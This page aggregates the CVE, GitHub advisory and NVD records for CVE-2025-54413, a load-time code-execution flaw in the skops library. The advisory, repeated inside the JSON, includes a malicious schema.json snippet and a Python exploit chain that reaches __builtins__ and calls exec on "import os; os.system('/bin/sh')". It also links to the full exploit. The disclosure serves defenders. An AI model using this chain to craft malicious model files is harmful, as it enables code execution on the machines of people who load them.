cvelistv5 - cve-2025-54413

CVE-2025-54413 (GCVE-0-2025-54413)

Vulnerability from cvelistv5 – Published: 2025-07-26 03:29 – Updated: 2025-07-28 13:59

Summary

skops is a Python library which helps users share and ship their scikit-learn based models. Versions 0.11.0 and below contain an inconsistency in MethodNode, which can be exploited to access unexpected object fields through dot notation. This can be used to achieve arbitrary code execution at load time. While this issue may seem similar to GHSA-m7f4-hrc6-fwg3, it is actually more severe, as it relies on fewer assumptions about trusted types. This is fixed in version 12.0.0.

Severity ?

8.7 (High)


                        
                          CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

CWE

CWE-351 - Insufficient Type Distinction

Assigner

GitHub_M

References

URL

Tags

	https://github.com/skops-dev/skops/security/advis…	x_refsource_CONFIRM
	https://github.com/skops-dev/skops/security/advis…	x_refsource_MISC
	https://github.com/skops-dev/skops/commit/0aeca05…	x_refsource_MISC
	https://drive.google.com/drive/folders/1bmVV18mnP…	x_refsource_MISC
	https://github.com/skops-dev/skops/releases/tag/v0.12.0	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	skops-dev	skops	Affected: < 12.0.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-54413",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-07-28T13:59:46.714447Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-07-28T13:59:58.255Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "skops",
          "vendor": "skops-dev",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 12.0.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "skops is a Python library which helps users share and ship their scikit-learn based models. Versions 0.11.0 and below contain an inconsistency in MethodNode, which can be exploited to access unexpected object fields through dot notation. This can be used to achieve arbitrary code execution at load time. While this issue may seem similar to GHSA-m7f4-hrc6-fwg3, it is actually more severe, as it relies on fewer assumptions about trusted types. This is fixed in version 12.0.0."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "PRESENT",
            "attackVector": "LOCAL",
            "baseScore": 8.7,
            "baseSeverity": "HIGH",
            "privilegesRequired": "NONE",
            "subAvailabilityImpact": "HIGH",
            "subConfidentialityImpact": "HIGH",
            "subIntegrityImpact": "HIGH",
            "userInteraction": "ACTIVE",
            "vectorString": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
            "version": "4.0",
            "vulnAvailabilityImpact": "HIGH",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "HIGH"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-351",
              "description": "CWE-351: Insufficient Type Distinction",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-07-26T03:29:43.716Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/skops-dev/skops/security/advisories/GHSA-4v6w-xpmh-gfgp",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/skops-dev/skops/security/advisories/GHSA-4v6w-xpmh-gfgp"
        },
        {
          "name": "https://github.com/skops-dev/skops/security/advisories/GHSA-m7f4-hrc6-fwg3",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/skops-dev/skops/security/advisories/GHSA-m7f4-hrc6-fwg3"
        },
        {
          "name": "https://github.com/skops-dev/skops/commit/0aeca055509dfb48c1506870aabdd9e247adf603",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/skops-dev/skops/commit/0aeca055509dfb48c1506870aabdd9e247adf603"
        },
        {
          "name": "https://drive.google.com/drive/folders/1bmVV18mnPbWy21hVYgf51yVJpf78vtB_?usp=sharing",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://drive.google.com/drive/folders/1bmVV18mnPbWy21hVYgf51yVJpf78vtB_?usp=sharing"
        },
        {
          "name": "https://github.com/skops-dev/skops/releases/tag/v0.12.0",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/skops-dev/skops/releases/tag/v0.12.0"
        }
      ],
      "source": {
        "advisory": "GHSA-4v6w-xpmh-gfgp",
        "discovery": "UNKNOWN"
      },
      "title": "skops\u0027 MethodNode can access unexpected object fields through dot notation, leading to arbitrary code execution at load time"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-54413",
    "datePublished": "2025-07-26T03:29:43.716Z",
    "dateReserved": "2025-07-21T23:18:10.280Z",
    "dateUpdated": "2025-07-28T13:59:58.255Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2025-54413\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-07-26T04:16:06.793\",\"lastModified\":\"2025-07-29T14:14:55.157\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"skops is a Python library which helps users share and ship their scikit-learn based models. Versions 0.11.0 and below contain an inconsistency in MethodNode, which can be exploited to access unexpected object fields through dot notation. This can be used to achieve arbitrary code execution at load time. While this issue may seem similar to GHSA-m7f4-hrc6-fwg3, it is actually more severe, as it relies on fewer assumptions about trusted types. This is fixed in version 12.0.0.\"},{\"lang\":\"es\",\"value\":\"skops es una librer\u00eda de Python que ayuda a los usuarios a compartir y enviar sus modelos basados en scikit-learn. Las versiones 0.11.0 y anteriores contienen una inconsistencia en MethodNode, que puede explotarse para acceder a campos de objeto inesperados mediante la notaci\u00f3n de puntos. Esto permite la ejecuci\u00f3n de c\u00f3digo arbitrario en tiempo de carga. Si bien este problema puede parecer similar a GHSA-m7f4-hrc6-fwg3, en realidad es m\u00e1s grave, ya que se basa en menos suposiciones sobre los tipos de confianza. Esto se solucion\u00f3 en la versi\u00f3n 12.0.0.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":8.7,\"baseSeverity\":\"HIGH\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"PRESENT\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"ACTIVE\",\"vulnConfidentialityImpact\":\"HIGH\",\"vulnIntegrityImpact\":\"HIGH\",\"vulnAvailabilityImpact\":\"HIGH\",\"subConfidentialityImpact\":\"HIGH\",\"subIntegrityImpact\":\"HIGH\",\"subAvailabilityImpact\":\"HIGH\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-351\"}]}],\"references\":[{\"url\":\"https://drive.google.com/drive/folders/1bmVV18mnPbWy21hVYgf51yVJpf78vtB_?usp=sharing\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/skops-dev/skops/commit/0aeca055509dfb48c1506870aabdd9e247adf603\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/skops-dev/skops/releases/tag/v0.12.0\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/skops-dev/skops/security/advisories/GHSA-4v6w-xpmh-gfgp\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/skops-dev/skops/security/advisories/GHSA-m7f4-hrc6-fwg3\",\"source\":\"security-advisories@github.com\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-54413\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-07-28T13:59:46.714447Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-07-28T13:59:50.260Z\"}}], \"cna\": {\"title\": \"skops\u0027 MethodNode can access unexpected object fields through dot notation, leading to arbitrary code execution at load time\", \"source\": {\"advisory\": \"GHSA-4v6w-xpmh-gfgp\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 8.7, \"attackVector\": \"LOCAL\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H\", \"userInteraction\": \"ACTIVE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"PRESENT\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"HIGH\", \"vulnIntegrityImpact\": \"HIGH\", \"subAvailabilityImpact\": \"HIGH\", \"vulnAvailabilityImpact\": \"HIGH\", \"subConfidentialityImpact\": \"HIGH\", \"vulnConfidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"skops-dev\", \"product\": \"skops\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 12.0.0\"}]}], \"references\": [{\"url\": \"https://github.com/skops-dev/skops/security/advisories/GHSA-4v6w-xpmh-gfgp\", \"name\": \"https://github.com/skops-dev/skops/security/advisories/GHSA-4v6w-xpmh-gfgp\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/skops-dev/skops/security/advisories/GHSA-m7f4-hrc6-fwg3\", \"name\": \"https://github.com/skops-dev/skops/security/advisories/GHSA-m7f4-hrc6-fwg3\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/skops-dev/skops/commit/0aeca055509dfb48c1506870aabdd9e247adf603\", \"name\": \"https://github.com/skops-dev/skops/commit/0aeca055509dfb48c1506870aabdd9e247adf603\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://drive.google.com/drive/folders/1bmVV18mnPbWy21hVYgf51yVJpf78vtB_?usp=sharing\", \"name\": \"https://drive.google.com/drive/folders/1bmVV18mnPbWy21hVYgf51yVJpf78vtB_?usp=sharing\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/skops-dev/skops/releases/tag/v0.12.0\", \"name\": \"https://github.com/skops-dev/skops/releases/tag/v0.12.0\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"skops is a Python library which helps users share and ship their scikit-learn based models. Versions 0.11.0 and below contain an inconsistency in MethodNode, which can be exploited to access unexpected object fields through dot notation. This can be used to achieve arbitrary code execution at load time. While this issue may seem similar to GHSA-m7f4-hrc6-fwg3, it is actually more severe, as it relies on fewer assumptions about trusted types. This is fixed in version 12.0.0.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-351\", \"description\": \"CWE-351: Insufficient Type Distinction\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-07-26T03:29:43.716Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2025-54413\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-07-28T13:59:58.255Z\", \"dateReserved\": \"2025-07-21T23:18:10.280Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-07-26T03:29:43.716Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

GHSA-4V6W-XPMH-GFGP

Vulnerability from github – Published: 2025-07-25 19:21 – Updated: 2025-09-05 16:08

Summary

Skops may allow MethodNode to access unexpected object fields through dot notation, leading to arbitrary code execution at load time

Details

Summary

An inconsistency in MethodNode can be exploited to access unexpected object fields through dot notation. This can be used to achieve arbitrary code execution at load time.

While this issue may seem similar to https://github.com/skops-dev/skops/security/advisories/GHSA-m7f4-hrc6-fwg3, it is actually more severe, as it relies on fewer assumptions about trusted types.

Details

The MethodNode allows access to attributes of existing objects via dot notation. However, there are several critical shortcomings:

Although the __class__ and __module__ fields are checked via get_untrusted_types and during the load phase (as a concatenated string), they are not actually used by MethodNode. Instead, the func and obj entries in the schema.json are used to determine behavior. This means that even an apparently harmless __module__.__class__ pair can lead to access of arbitrary attributes or methods of loaded objects, without any additional checks.
Nothing prevents an attacker from chaining multiple MethodNode instances to traverse the object hierarchy and access harmful attributes.

An object can be loaded using the ObjectNode, which normally enforces strict checks and allows only trusted or explicitly permitted objects. However, once the object is loaded, dot notation can be used to access any of its attributes or methods. Furthermore, by chaining multiple MethodNodes, one can traverse the Python object hierarchy and reach dangerous components such as the builtins dictionary—which contains functions like exec and eval.

This vulnerability allows the attacker to bypass both get_untrusted_types and load checks, enabling access to dangerous attributes and methods without triggering any alerts. As demonstrated in the PoC, arbitrary code execution is possible using just an anonymous object returned by get_untrusted_types (in the example, builtins.int, though any type would suffice since it doesn't influence the exploit).

For example, consider a malicious schema.json snippet like:

...
"__class__": "int",
"__module__": "builtins",
"__loader__": "MethodNode",
"content": {
  "obj": {
    "__class__": "int",
    "__module__": "builtins",
    "__loader__": "MethodNode",
    "content": {
      "obj": {
        "__class__": "QuadraticDiscriminantAnalysis",
        "__module__": "sklearn.discriminant_analysis",
        "__loader__": "ObjectNode",
        "__id__": 1
      },
      "func": "decision_function"
    }
  },
  "func": "__builtins__"
}
...

Here, the attacker loads a trusted QuadraticDiscriminantAnalysis object using ObjectNode, accesses its decision_function method via MethodNode, and then uses another MethodNode to access the __builtins__ dictionary—all without triggering the untrusted type detection mechanisms.

Proof of Concept (PoC)

The provided PoC demonstrates arbitrary code execution using only builtins.int as the type returned by get_untrusted_types and verified by load. Note that the actual type is fully controlled by the attacker and can be anything (e.g., provola.whatever), as it's not used by skops or the exploit.

Components Used in the Exploit

To craft the exploit, the following skops nodes are used:

MethodNode – to silently access arbitrary Python attributes via dot notation. This is the vulnerable core.
ObjectNode – to load a trusted object and use it as a base to access its attributes and methods. Also used to set object state via __setstate__.
PartialNode – to easily control arguments passed to functions accessed.
DefaultDictNode – to store a crafted call to exec using the default_factory attribute.
DictNode – to trigger the call at load time.
JsonNode, TypeNode, ListNode, etc. – for basic types, structures, and constants.

Additionally, the interesting implementation of GridSearchCV.score was leveraged, specifically:

def score(self, X, y=None, **params):
    ...
    scorer = self.scorer_[self.refit]
    return scorer(self.best_estimator_, X, y, **score_params)

Exploit Logic (Python Equivalent)

The schema.json used in this exploit is quite complex and carefully constructed. For this reason, the exploit logic is illustrated using the following Python code, which presents the core idea in a simplified and readable format. It simulates how the malicious schema.json is interpreted and executed by skops during model loading. The complete malicious skops model is attached for reference. This code demonstrates how an attacker can manipulate trusted objects and attributes using MethodNode, ultimately gaining access to the __builtins__ dictionary and invoking exec with a controlled payload. By chaining multiple nodes and leveraging Python's object model, arbitrary code execution is achieved—without triggering any type validation mechanisms.

from sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis
from sklearn.model_selection._search import GridSearchCV
from functools import partial
from collections import defaultdict

# Step 1: Access builtins via dot traversal
a = QuadraticDiscriminantAnalysis().decision_function.__builtins__

# Step 2: Prepare GridSearchCV with overridden attributes
b = GridSearchCV()
b._sklearn_version = "1.7.0"
... # Less interesting attributes
b.scorer_ = a  # builtins dict
b.refit = "exec"
b.best_estimator_ = "import os; os.system('/bin/sh')"

# Step 3: Create callable chain
c = b.score
d = partial(c, {}, {})  # empty dicts as globals/locals
e = defaultdict(**{})
e.default_factory = d
f = e.__getitem__  # dot traversal again :)

# Step 4: Force __getitem__ with a missing key to trigger default_factory

What we can see here is that, when f is called, it invokes the __getitem__ method of a defaultdict. Since the requested key doesn’t exist (the dict is empty), default_factory is triggered — which is the partial function d, wrapping the score method of the loaded GridSearchCV object.

Critically, the attributes of the GridSearchCV object (scorer_, refit, and best_estimator_) have been overwritten so that:

scorer_ is the __builtins__ dictionary,
refit is set to "exec" — selecting the exec function from __builtins__,
best_estimator_ contains the malicious payload: "import os; os.system('/bin/sh')".

When score() is eventually called via the partial function, it resolves self.scorer_[self.refit] to exec, and then calls it as:

exec(self.best_estimator_, {}, {})

In other words:

exec("import os; os.system('/bin/sh')", {}, {})

This leads to arbitrary command execution.

Finally, to trigger this chain, it's sufficient to force a call to f (i.e., __getitem__) with a key that doesn’t exist. This can be done automatically at model load time using DictNode. We use the implementation of DictNode._construct():

def _construct(self):
    content = gettype(self.module_name, self.class_name)()
    key_types = self.children["key_types"].construct()
    for k_type, (key, val) in zip(key_types, self.children["content"].items()):
        content[k_type(key)] = val.construct()
    return content

By setting key_types = [f] and using a missing key, the exploit executes automatically during model loading.

What is shown when loading the model

Suppose a user loads the model with the following code:

from skops.io import load, get_untrusted_types

unknown_types = get_untrusted_types(file="model.skops")
print("Unknown types", unknown_types)
input("Press enter to load the model...")
loaded = load("model.skops", trusted=unknown_types)

The output will be:

Unkonown types ['builtins.int']
Press enter to load the model...

However, the model loading will trigger the execution of the payload, which in this case is a shell command. The same can be modified to execute any arbitrary code.

Attachments

Tthe complete exploit is uploaded in the following drive location: https://drive.google.com/drive/folders/1bmVV18mnPbWy21hVYgf51yVJpf78vtB_?usp=sharing

Impact

An attacker can craft a malicious model file that, when loaded, executes arbitrary code on the victim’s machine. This occurs at load time, requiring no user interaction beyond loading the model. Given that skops is often used in collaborative environments and is designed with security in mind, this vulnerability poses a significant threat.

Severity ?

8.7 (High)


                  
                    CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "skops"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.12.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-54413"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-351"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-07-25T19:21:31Z",
    "nvd_published_at": "2025-07-26T04:16:06Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nAn inconsistency in `MethodNode` can be exploited to access unexpected object fields through dot notation. This can be used to achieve **arbitrary code execution at load time**.\n\nWhile this issue may seem similar to https://github.com/skops-dev/skops/security/advisories/GHSA-m7f4-hrc6-fwg3, it is actually more severe, as it relies on fewer assumptions about trusted types.\n\n\n## Details\n\nThe `MethodNode` allows access to attributes of existing objects via dot notation. However, there are several critical shortcomings:\n\n* Although the `__class__` and `__module__` fields are checked via `get_untrusted_types` and during the `load` phase (as a concatenated string), **they are not actually used by `MethodNode`**. Instead, the `func` and `obj` entries in the `schema.json` are used to determine behavior. This means that even an apparently harmless `__module__.__class__` pair can lead to access of arbitrary attributes or methods of loaded objects, without any additional checks.\n\n* **Nothing prevents an attacker from chaining multiple `MethodNode` instances** to traverse the object hierarchy and access harmful attributes.\n\nAn object can be loaded using the `ObjectNode`, which normally enforces strict checks and allows only trusted or explicitly permitted objects. However, once the object is loaded, dot notation can be used to access any of its attributes or methods. Furthermore, by chaining multiple `MethodNode`s, one can traverse the Python object hierarchy and reach dangerous components such as the `builtins` dictionary\u2014which contains functions like `exec` and `eval`.\n\nThis vulnerability allows the attacker to **bypass both `get_untrusted_types` and `load` checks**, enabling access to dangerous attributes and methods without triggering any alerts. As demonstrated in the PoC, arbitrary code execution is possible using just an anonymous object returned by `get_untrusted_types` (in the example, `builtins.int`, though any type would suffice since it doesn\u0027t influence the exploit).\n\n\nFor example, consider a malicious `schema.json` snippet like:\n\n```json\n...\n\"__class__\": \"int\",\n\"__module__\": \"builtins\",\n\"__loader__\": \"MethodNode\",\n\"content\": {\n  \"obj\": {\n    \"__class__\": \"int\",\n    \"__module__\": \"builtins\",\n    \"__loader__\": \"MethodNode\",\n    \"content\": {\n      \"obj\": {\n        \"__class__\": \"QuadraticDiscriminantAnalysis\",\n        \"__module__\": \"sklearn.discriminant_analysis\",\n        \"__loader__\": \"ObjectNode\",\n        \"__id__\": 1\n      },\n      \"func\": \"decision_function\"\n    }\n  },\n  \"func\": \"__builtins__\"\n}\n...\n```\n\nHere, the attacker loads a trusted `QuadraticDiscriminantAnalysis` object using `ObjectNode`, accesses its `decision_function` method via `MethodNode`, and then uses another `MethodNode` to access the `__builtins__` dictionary\u2014**all without triggering the untrusted type detection mechanisms**.\n\n\n## Proof of Concept (PoC)\n\nThe provided PoC demonstrates arbitrary code execution using only `builtins.int` as the type returned by `get_untrusted_types` and verified by `load`. Note that the actual type is fully controlled by the attacker and can be anything (e.g., `provola.whatever`), as it\u0027s not used by `skops` or the exploit.\n\n### Components Used in the Exploit\n\nTo craft the exploit, the following `skops` nodes are used:\n\n* **`MethodNode`** \u2013 to silently access arbitrary Python attributes via dot notation. This is the vulnerable core.\n* **`ObjectNode`** \u2013 to load a trusted object and use it as a base to access its attributes and methods. Also used to set object state via `__setstate__`.\n* **`PartialNode`** \u2013 to easily control arguments passed to functions accessed.\n* **`DefaultDictNode`** \u2013 to store a crafted call to `exec` using the `default_factory` attribute.\n* **`DictNode`** \u2013 to trigger the call at load time.\n* **`JsonNode`, `TypeNode`, `ListNode`**, etc. \u2013 for basic types, structures, and constants.\n\nAdditionally, the interesting implementation of `GridSearchCV.score` was leveraged, specifically:\n\n```python\ndef score(self, X, y=None, **params):\n    ...\n    scorer = self.scorer_[self.refit]\n    return scorer(self.best_estimator_, X, y, **score_params)\n```\n\n\n### Exploit Logic (Python Equivalent)\nThe `schema.json` used in this exploit is quite complex and carefully constructed. For this reason, the exploit logic is illustrated using the following Python code, which presents the core idea in a simplified and readable format. It simulates how the malicious `schema.json` is interpreted and executed by `skops` during model loading. The complete malicious `skops` model is attached for reference. This code demonstrates how an attacker can manipulate trusted objects and attributes using `MethodNode`, ultimately gaining access to the `__builtins__` dictionary and invoking `exec` with a controlled payload. By chaining multiple nodes and leveraging Python\u0027s object model, arbitrary code execution is achieved\u2014without triggering any type validation mechanisms.\n\n\n```python\nfrom sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis\nfrom sklearn.model_selection._search import GridSearchCV\nfrom functools import partial\nfrom collections import defaultdict\n\n# Step 1: Access builtins via dot traversal\na = QuadraticDiscriminantAnalysis().decision_function.__builtins__\n\n# Step 2: Prepare GridSearchCV with overridden attributes\nb = GridSearchCV()\nb._sklearn_version = \"1.7.0\"\n... # Less interesting attributes\nb.scorer_ = a  # builtins dict\nb.refit = \"exec\"\nb.best_estimator_ = \"import os; os.system(\u0027/bin/sh\u0027)\"\n\n# Step 3: Create callable chain\nc = b.score\nd = partial(c, {}, {})  # empty dicts as globals/locals\ne = defaultdict(**{})\ne.default_factory = d\nf = e.__getitem__  # dot traversal again :)\n\n# Step 4: Force __getitem__ with a missing key to trigger default_factory\n```\n\nWhat we can see here is that, when `f` is called, it invokes the `__getitem__` method of a `defaultdict`. Since the requested key doesn\u2019t exist (the dict is empty), `default_factory` is triggered \u2014 which is the partial function `d`, wrapping the `score` method of the loaded `GridSearchCV` object.\n\nCritically, the attributes of the `GridSearchCV` object (`scorer_`, `refit`, and `best_estimator_`) have been overwritten so that:\n\n* `scorer_` is the `__builtins__` dictionary,\n* `refit` is set to `\"exec\"` \u2014 selecting the `exec` function from `__builtins__`,\n* `best_estimator_` contains the malicious payload: `\"import os; os.system(\u0027/bin/sh\u0027)\"`.\n\nWhen `score()` is eventually called via the partial function, it resolves `self.scorer_[self.refit]` to `exec`, and then calls it as:\n\n```python\nexec(self.best_estimator_, {}, {})\n```\n\nIn other words:\n\n```python\nexec(\"import os; os.system(\u0027/bin/sh\u0027)\", {}, {})\n```\n\nThis leads to **arbitrary command execution**.\n\nFinally, to trigger this chain, it\u0027s sufficient to force a call to `f` (i.e., `__getitem__`) with a key that doesn\u2019t exist. This can be done automatically at model load time using `DictNode`. We use the implementation of `DictNode._construct()`:\n\n```python\ndef _construct(self):\n    content = gettype(self.module_name, self.class_name)()\n    key_types = self.children[\"key_types\"].construct()\n    for k_type, (key, val) in zip(key_types, self.children[\"content\"].items()):\n        content[k_type(key)] = val.construct()\n    return content\n```\n\nBy setting `key_types = [f]` and using a missing key, the exploit executes automatically during model loading.\n\n### What is shown when loading the model\n\nSuppose a user loads the model with the following code:\n\n```python\nfrom skops.io import load, get_untrusted_types\n\nunknown_types = get_untrusted_types(file=\"model.skops\")\nprint(\"Unknown types\", unknown_types)\ninput(\"Press enter to load the model...\")\nloaded = load(\"model.skops\", trusted=unknown_types)\n```\n\nThe output will be:\n\n```\nUnkonown types [\u0027builtins.int\u0027]\nPress enter to load the model...\n```\n\nHowever, the model loading will trigger the execution of the payload, which in this case is a shell command. The same can be modified to execute any arbitrary code.\n\n\n### Attachments\nTthe complete exploit is uploaded in the following drive location: https://drive.google.com/drive/folders/1bmVV18mnPbWy21hVYgf51yVJpf78vtB_?usp=sharing\n\n\n## Impact\n\nAn attacker can craft a malicious model file that, when loaded, executes **arbitrary code** on the victim\u2019s machine. This occurs **at load time**, requiring no user interaction beyond loading the model. Given that `skops` is often used in collaborative environments and is designed with security in mind, this vulnerability poses a significant threat.",
  "id": "GHSA-4v6w-xpmh-gfgp",
  "modified": "2025-09-05T16:08:49Z",
  "published": "2025-07-25T19:21:31Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/skops-dev/skops/security/advisories/GHSA-4v6w-xpmh-gfgp"
    },
    {
      "type": "WEB",
      "url": "https://github.com/skops-dev/skops/security/advisories/GHSA-m7f4-hrc6-fwg3"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54413"
    },
    {
      "type": "WEB",
      "url": "https://github.com/skops-dev/skops/commit/0aeca055509dfb48c1506870aabdd9e247adf603"
    },
    {
      "type": "WEB",
      "url": "https://drive.google.com/drive/folders/1bmVV18mnPbWy21hVYgf51yVJpf78vtB_?usp=sharing"
    },
    {
      "type": "WEB",
      "url": "https://github.com/io-no/CVE-Reports/tree/main/CVE-2025-54413"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/skops-dev/skops"
    },
    {
      "type": "WEB",
      "url": "https://github.com/skops-dev/skops/releases/tag/v0.12.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Skops may allow MethodNode to access unexpected object fields through dot notation, leading to arbitrary code execution at load time"
}

FKIE_CVE-2025-54413

Vulnerability from fkie_nvd - Published: 2025-07-26 04:16 - Updated: 2025-07-29 14:14

Severity ?

8.7 (High) - CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Summary

References

	URL	Tags
	security-advisories@github.com	https://drive.google.com/drive/folders/1bmVV18mnPbWy21hVYgf51yVJpf78vtB_?usp=sharing
	security-advisories@github.com	https://github.com/skops-dev/skops/commit/0aeca055509dfb48c1506870aabdd9e247adf603
	security-advisories@github.com	https://github.com/skops-dev/skops/releases/tag/v0.12.0
	security-advisories@github.com	https://github.com/skops-dev/skops/security/advisories/GHSA-4v6w-xpmh-gfgp
